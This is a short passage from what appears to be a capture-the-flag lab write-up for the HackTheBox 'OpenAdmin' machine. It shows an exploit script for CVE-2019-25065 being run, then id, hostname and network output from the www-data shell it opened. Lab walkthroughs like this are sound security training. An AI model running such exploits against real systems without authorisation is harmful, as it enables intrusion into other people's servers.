Exploitation


I will execute the Exploit script

┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ ./47691.sh
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ hostname
openadmin
$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.171  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:4ef2  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:4ef2  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:4e:f2  txqueuelen 1000  (Ethernet)
        RX packets 1971478  bytes 365568113 (365.5 MB)
        RX errors 0  dropped 19  overruns 0  frame 0
        TX packets 1973680  bytes 963843939 (963.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 12443  bytes 983826 (983.8 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12443  bytes 983826 (983.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established as openadmin via exploiting CVE-2019-25065